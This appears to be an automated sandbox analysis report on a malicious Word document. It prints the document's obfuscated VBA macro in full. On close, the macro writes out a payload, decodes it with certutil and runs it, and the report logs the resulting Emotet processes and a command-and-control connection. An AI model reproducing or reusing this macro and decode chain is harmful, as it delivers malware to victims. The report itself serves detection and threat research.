                                                      Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAApTiijbS9G8G0vRvBtL0bw2bO38GcvRvDZs7XwGi9G8NmztPB1L0bwP0dD8U0vRvA/R0LxYi9G8D9HRfF+L0bwZFfV8GgvRvBtL0fwCS9G8PdGT/FsL0bw90ZG8WwvRvD3RrnwbC9G8G0v0fBsL0bw90ZE8WwvRvBSaWNobS9G8AAAAAAAAAAAUEUAAEwBBQAr7ZhfAAAAAAAAAADgAAIhCwEOEAAUAQAAxAUAAAAAAGR9AAAAEAAAADABAAAAABAAEAAAAAIAAAUAAQAAAAAABQABAAAAAAAAEAcAAAQAAAAAAAADAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAEIUBAEgAAABYhQEAPAAAAACwAQBQQgUAAAAAAAAAAAAAAAAAAAAAAAAABwCIDgAAMHwBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABofAEAQAAAAAAAAAAAAAAAADABADgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGcSAQAAEAAAABQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABkXAAAADABAABeAAAAGAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA6BEAAACQAQAACAAAAHYBAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAFBCBQAAsAEAAEQFAAB+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAACIDgAAAAAHAAAQAAAAwgYAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                      Static File Info

                                                      General

                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: User, Template: Normal.dotm, Last Saved By: kirin, Revision Number: 7, Name of Creating Application: Microsoft Office Word, Total Editing Time: 20:00, Create Time/Date: Sun May 10 01:31:00 2020, Last Saved Time/Date: Wed Oct 28 04:44:00 2020, Number of Pages: 2, Number of Words: 89482, Number of Characters: 510049, Security: 0
                                                      Entropy (8bit):6.919205506848504
                                                      TrID:
                                                      • Microsoft Word document (32009/1) 54.23%
                                                      • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                      File name:sample1.doc
                                                      File size:850432
                                                      MD5:7dbd8ecfada1d39a81a58c9468b91039
                                                      SHA1:0d21e2742204d1f98f6fcabe0544570fd6857dd3
                                                      SHA256:dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95
                                                      SHA512:a851ac80b43ebdb8e990c2eb3daabb456516fc40bb43c9f76d0112674dbd6264efce881520744f0502f2962fc0bb4024e7d73ea66d56bc87c0cc6dfde2ab869a
                                                      SSDEEP:12288:emkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCspBZZLFLIx/mBDOq1a:emkvVW9gnyQxtN9eEBDOQa
                                                      File Content Preview:........................>.......................g...........j...............Z...[...\...]...^..._...`...a...b...c...d...e...f..................................................................................................................................

                                                      File Icon

                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                      Static OLE Info

                                                      General

                                                      Document Type:OLE
                                                      Number of OLE Files:1

                                                      OLE File "sample1.doc"

                                                      Indicators

                                                      Has Summary Info:True
                                                      Application Name:Microsoft Office Word
                                                      Encrypted Document:False
                                                      Contains Word Document Stream:True
                                                      Contains Workbook/Book Stream:False
                                                      Contains PowerPoint Document Stream:False
                                                      Contains Visio Document Stream:False
                                                      Contains ObjectPool Stream:
                                                      Flash Objects Count:
                                                      Contains VBA Macros:True

                                                      Summary

                                                      Code Page:1252
                                                      Title:
                                                      Subject:
                                                      Author:User
                                                      Keywords:
                                                      Comments:
                                                      Template:Normal.dotm
                                                      Last Saved By:kirin
                                                      Revion Number:7
                                                      Total Edit Time:1200
                                                      Create Time:2020-05-10 00:31:00
                                                      Last Saved Time:2020-10-28 04:44:00
                                                      Number of Pages:2
                                                      Number of Words:89482
                                                      Number of Characters:510049
                                                      Creating Application:Microsoft Office Word
                                                      Security:0

                                                      Document Summary

                                                      Document Code Page:1252
                                                      Number of Lines:4250
                                                      Number of Paragraphs:1196
                                                      Thumbnail Scaling Desired:False
                                                      Company:
                                                      Contains Dirty Links:False
                                                      Shared Document:False
                                                      Changed Hyperlinks:False
                                                      Application Version:1048576

                                                      Streams with VBA

                                                      VBA File Name: ThisDocument.cls, Stream Size: 3696
                                                      General
                                                      Stream Path:Macros/VBA/ThisDocument
                                                      VBA File Name:ThisDocument.cls
                                                      Stream Size:3696
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . ' E . . . . . . . . . . . . . . . . . . . ( . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . S l e e p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . .
                                                      Data Raw:01 16 03 00 00 18 01 00 00 dc 06 00 00 fc 00 00 00 02 02 00 00 ff ff ff ff e3 06 00 00 7b 0b 00 00 00 00 00 00 01 00 00 00 f1 27 45 f5 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 32 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6c 65 65 70 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00

                                                      VBA Code Keywords

                                                      Keyword
                                                      #Else
                                                      VB_Name
                                                      VB_Creatable
                                                      ".pdf"):
                                                      SetTask(Task
                                                      VB_Exposed
                                                      Null,
                                                      Form_Close()
                                                      ("doc"):
                                                      Formt,
                                                      VB_TemplateDerived
                                                      Function
                                                      (ByVal
                                                      String
                                                      Right(Range.Text,
                                                      String)
                                                      Form_Close
                                                      Long)
                                                      Long,
                                                      VB_Customizable
                                                      Task,
                                                      ("xls"):
                                                      FileName:=STP
                                                      ".xls
                                                      PtrSafe
                                                      Left(ActiveDocument.Paragraphs(One).Range.Text,
                                                      Declare
                                                      "ThisDocument"
                                                      SetTask
                                                      False
                                                      FileFormat:=wdFormatText
                                                      Attribute
                                                      Private
                                                      VB_PredeclaredId
                                                      Sleep
                                                      VB_GlobalNameSpace
                                                      VB_Base
                                                      ".pdf,In")
                                                      Document_Close()
                                                      VBA Code
                                                      Attribute VB_Name = "ThisDocument"
                                                      Attribute VB_Base = "1Normal.ThisDocument"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = True
                                                      Attribute VB_Customizable = True
                                                      #If VBA7 Then
                                                      Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
                                                      #Else
                                                      Private Declare Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
                                                      #End If
                                                      Private Ms13
                                                      Private One As String
                                                      Private Two As String
                                                      Private STP As String
                                                      
                                                      Private Sub Document_Close()
                                                          Form_Close
                                                      End Sub
                                                      Private Sub Form_Close()
                                                          STP = Button_Click2(2, 16) + "Ksh1"
                                                          Set Ms13 = CreateObject(Button_Click2(4, 22))
                                                          One = Button_Click2(8, 16)
                                                          Two = Button_Click2(6, 8)
                                                          ActiveDocument.Range(Start:=0, End:=3561).Delete
                                                          SaveAs3 ("xls"): SaveAs3 ("doc"):
                                                          SetTask (One + " " + STP + ".xls " + STP + ".pdf"): Sleep 6000: SetTask (Two + " " + STP + ".pdf,In")
                                                      End Sub
                                                      Private Function Button_Click2(One As Long, Two As Long) As String
                                                          Button_Click2 = Left(ActiveDocument.Paragraphs(One).Range.Text, Two)
                                                      End Function
                                                      Private Function Button_Click3(One As Long) As String
                                                           Button_Click3 = Right(Range.Text, One)
                                                      End Function
                                                      Private Function SaveAs3(Formt As String)
                                                          ActiveDocument.SaveAs2 FileName:=STP + "." + Formt, FileFormat:=wdFormatText
                                                      End Function
                                                      Private Function SetTask(Task As String)
                                                          Ms13.create Task, Null, Null, act
                                                      End Function

                                                      Streams

                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                      General
                                                      Stream Path:\x1CompObj
                                                      File Type:data
                                                      Stream Size:114
                                                      Entropy:4.2359563651
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                      General
                                                      Stream Path:\x5DocumentSummaryInformation
                                                      File Type:data
                                                      Stream Size:4096
                                                      Entropy:0.25569624217
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                      General
                                                      Stream Path:\x5SummaryInformation
                                                      File Type:data
                                                      Stream Size:4096
                                                      Entropy:0.473780805052
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U s e r . . . . . . . . . . . . . . . . . . . .
                                                      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                                                      Stream Path: 1Table, File Type: data, Stream Size: 7386
                                                      General
                                                      Stream Path:1Table
                                                      File Type:data
                                                      Stream Size:7386
                                                      Entropy:5.92077573609
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                      Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                      Stream Path: Data, File Type: data, Stream Size: 187989
                                                      General
                                                      Stream Path:Data
                                                      File Type:data
                                                      Stream Size:187989
                                                      Entropy:7.97862280177
                                                      Base64 Encoded:True
                                                      Data ASCII:U . . . D . d . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . . . . . . . . . . . . . . . . . . C . . . * . . . . A . . . . . . . . . . . . . . . . . . . . . . t . e . m . p . l . a . t . e . . . . . . . . . . . . . . . b . . . . . . . . . . . . b r . . . . 7 . a . _ . . . . . . . . . . . . D . . . . . . . . n . . . . . . . . . b r . . . . 7 . a . _ . . . . P N G . . . . . . . . I H D R . . . O . . . . . . . . . 3 0 . u
                                                      Data Raw:55 de 02 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a3 31 e3 1d c3 03 c3 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4e 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 2a 00 00 00 04 41 01 00 00 00 05 c1 12 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 65 00
                                                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 367
                                                      General
                                                      Stream Path:Macros/PROJECT
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Stream Size:367
                                                      Entropy:5.29037636248
                                                      Base64 Encoded:True
                                                      Data ASCII:I D = " { D 4 7 2 8 3 5 A - 3 8 9 1 - 4 D B 9 - 8 6 F 0 - 0 C 1 2 4 A F F D 6 E 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 8 0 A E 9 E F E D E F E D E F E D E F E D " . . D P B = " 9 6 9 4 7 7 F B 8 B 0 7 1 8 0 8 1 8 0 8 1 8 " . . G C = " 2 4 2 6 C 5 8 9 D D 1 6 D E 1 6 D E E 9 " . . . . [ H o s t E x t e n d e r I n f o ]
                                                      Data Raw:49 44 3d 22 7b 44 34 37 32 38 33 35 41 2d 33 38 39 31 2d 34 44 42 39 2d 38 36 46 30 2d 30 43 31 32 34 41 46 46 44 36 45 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
                                                      General
                                                      Stream Path:Macros/PROJECTwm
                                                      File Type:data
                                                      Stream Size:41
                                                      Entropy:3.07738448508
                                                      Base64 Encoded:False
                                                      Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                      Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2845
                                                      General
                                                      Stream Path:Macros/VBA/_VBA_PROJECT
                                                      File Type:data
                                                      Stream Size:2845
                                                      Entropy:4.32828178006
                                                      Base64 Encoded:False
                                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                      Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513
                                                      General
                                                      Stream Path:Macros/VBA/dir
                                                      File Type:data
                                                      Stream Size:513
                                                      Entropy:6.25624133358
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . Y { . ` . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
                                                      Data Raw:01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 59 7b a3 60 0a 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                      Stream Path: WordDocument, File Type: data, Stream Size: 627764
                                                      General
                                                      Stream Path:WordDocument
                                                      File Type:data
                                                      Stream Size:627764
                                                      Entropy:6.04018774642
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . { . . . . . . . . . . . . . . . . . . . . . . . . - . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . f . . . f . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Data Raw:ec a5 c1 00 7b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 eb 2d 09 00 0e 00 62 6a 62 6a 84 bd 84 bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 94 09 00 e6 d7 d5 66 e6 d7 d5 66 eb 25 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      01/14/21-04:02:18.387074TCP2404310ET CNC Feodo Tracker Reported CnC Server TCP group 64917080192.168.2.22177.130.51.198
                                                      01/14/21-04:02:20.339180ICMP449ICMP Time-To-Live Exceeded in Transit177.130.48.10192.168.2.22
                                                      01/14/21-04:02:23.401000ICMP449ICMP Time-To-Live Exceeded in Transit177.130.48.10192.168.2.22

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 14, 2021 04:02:18.387073994 CET4917080192.168.2.22177.130.51.198
                                                      Jan 14, 2021 04:02:21.448874950 CET4917080192.168.2.22177.130.51.198

                                                      Code Manipulations

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Start time:04:00:33
                                                      Start date:14/01/2021
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                      Imagebase:0x13fe60000
                                                      File size:1424032 bytes
                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:04:01:43
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\System32\certutil.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf
                                                      Imagebase:0xff9a0000
                                                      File size:1192448 bytes
                                                      MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:04:01:45
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                      Imagebase:0xff0e0000
                                                      File size:27136 bytes
                                                      MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:04:01:57
                                                      Start date:14/01/2021
                                                      Path:C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp/tmp_e473b4.exe
                                                      Imagebase:0x400000
                                                      File size:344110 bytes
                                                      MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000003.2252976219.0000000000588000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2256830860.0000000000586000.00000004.00000020.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:04:01:59
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\SysWOW64\srclient\auditpolmsg.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\srclient\auditpolmsg.exe
                                                      Imagebase:0x400000
                                                      File size:344110 bytes
                                                      MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000003.2257551859.00000000005F8000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2263042599.00000000005F6000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:04:02:01
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\SysWOW64\mfc110\wcnwiz.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\mfc110\wcnwiz.exe
                                                      Imagebase:0x400000
                                                      File size:344110 bytes
                                                      MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000003.2262096055.0000000000548000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2265953499.0000000000546000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:04:02:04
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\SysWOW64\capiprovider\SampleRes.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\capiprovider\SampleRes.exe
                                                      Imagebase:0x400000
                                                      File size:344110 bytes
                                                      MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000003.2266631097.0000000000578000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2271093826.0000000000576000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:04:02:06
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe
                                                      Imagebase:0x400000
                                                      File size:344110 bytes
                                                      MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2276502729.00000000005E6000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000003.2271289978.00000000005E8000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:04:02:08
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\SysWOW64\KBDNO\mfc140.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\KBDNO\mfc140.exe
                                                      Imagebase:0x400000
                                                      File size:344110 bytes
                                                      MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Author: Joe Security
